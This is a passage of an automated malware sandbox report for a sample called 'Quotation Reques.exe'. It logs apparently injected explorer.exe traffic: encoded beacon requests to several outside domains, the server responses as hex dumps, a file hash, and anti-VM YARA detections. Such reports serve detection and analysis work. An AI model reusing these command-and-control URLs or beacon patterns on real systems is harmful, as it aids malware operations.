0 | 192.168.2.5 | 49727 | 107.180.46.143 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:39:19.310297966 CET | 4792 | OUT | GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1
Host: www.mojavewellnessaz.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:39:20.749190092 CET | 5336 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 23 Feb 2021 08:39:19 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://mojavewellnessaz.com/0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49728 | 138.197.103.178 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:39:30.249361038 CET | 10856 | OUT | GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1
Host: www.ficuswildlife.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:39:30.375597954 CET | 10857 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=utf-8
Location: /redirect.php?host=www.ficuswildlife.com
Server: Caddy
Date: Tue, 23 Feb 2021 08:39:30 GMT
Content-Length: 75
Connection: close
Data Raw: 3c 61 20 68 72 65 66 3d 22 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 68 6f 73 74 3d 77 77 77 2e 66 69 63 75 73 77 69 6c 64 6c 69 66 65 2e 63 6f 6d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
Data Ascii: <a href="/redirect.php?host=www.ficuswildlife.com">Moved Permanently</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49729 | 77.72.1.202 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:39:35.799494028 CET | 10858 | OUT | GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
Host: www.thisisauckland.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:39:36.506441116 CET | 10859 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0
X-Litespeed-Cache: miss
Content-Length: 0
Date: Tue, 23 Feb 2021 08:39:36 GMT
Server: LiteSpeed
Vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49741 | 51.83.43.226 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:39:46.953430891 CET | 11756 | OUT | GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
Host: www.trainingkanban.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:39:47.003861904 CET | 11757 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 23 Feb 2021 08:39:46 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: https://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0
Content-Length: 435
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 69 6e 69 6e 67 6b 61 6e 62 61 6e 2e 63 6f 6d 2f 30 77 64 6e 2f 3f 6e 66 75 78 5a 72 3d 69 78 36 63 74 4e 76 41 32 37 54 6b 6a 63 56 56 6a 55 38 34 6e 6b 6f 52 42 68 46 4f 63 65 44 31 75 74 2f 53 4d 50 44 48 4e 34 6f 71 5a 59 6a 6e 51 59 2f 32 65 4f 39 75 2b 56 6e 43 6b 52 39 6e 32 42 49 6c 26 61 6d 70 3b 76 32 4d 48 63 3d 33 66 50 48 56 5a 57 68 75 32 45 64 41 5a 66 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 72 61 69 6e 69 6e 67 6b 61 6e 62 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.trainingkanban.com/0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&amp;v2MHc=3fPHVZWhu2EdAZf0">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.trainingkanban.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49742 | 160.153.133.87 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:39:53.143121958 CET | 11759 | OUT | GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1
Host: www.sphenecouture.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:39:53.203397036 CET | 11761 | IN | HTTP/1.1 404 Not Found
Date: Tue, 23 Feb 2021 08:39:53 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 1699
Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 
20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75
                                                                                              Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49743 | 194.9.94.85 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:40:03.483678102 CET | 11787 | OUT | GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1
Host: www.dorteklarskov.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:40:03.546607018 CET | 11788 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 23 Feb 2021 08:40:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.3
                                                                                              Data Raw: 31 37 38 34 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0a 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 6d 2e 6a 73 3f 69 64 3d 27 2b 69 2b 64 6c 3b 66 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6a 2c 66 29 3b 0a 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 64 61 74 61 4c 61 79 65 72 27 2c 27 47 54 4d 2d 4e 50 33 4d 46 53 4b 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 09 09 09 09 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 
63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 44 47 45 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6c 6f 6f 70 69 61 2d 74 65 73 74 22 20 63 6f 6e 74 65 6e 74 3d 22 58 73 64 58 41 49 78 68 61 38 71 39 58 6a 61 6d 63 6b 34 48 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 36 33 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 2e 73 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 35 37 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 33 32 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 2e 73 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74
                                                                                              Data Ascii: 1784<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 132dpi)" href="https://static.loopia.se/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolut


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49744 | 194.59.164.34 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:40:09.038458109 CET | 11794 | OUT | GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1
Host: www.gurumanindustries.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 09:40:09.429874897 CET | 11796 | IN | HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Last-Modified: Tue, 25 Jun 2019 07:07:21 GMT
Etag: "999-5d11c829-c5eb53afe31087fb;;;"
Accept-Ranges: bytes
Content-Length: 2457
Date: Tue, 23 Feb 2021 08:40:09 GMT
Server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 
2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, some


                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              Behavior

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:09:38:09
                                                                                              Start date:23/02/2021
                                                                                              Path:C:\Users\user\Desktop\Quotation Reques.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\Desktop\Quotation Reques.exe'
                                                                                              Imagebase:0x90000
                                                                                              File size:549376 bytes
                                                                                              MD5 hash:5A752FCD71ACB65C618A829610B7B7E1
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.252016521.00000000025CB000.00000004.00000001.sdmp, Author: Joe Security
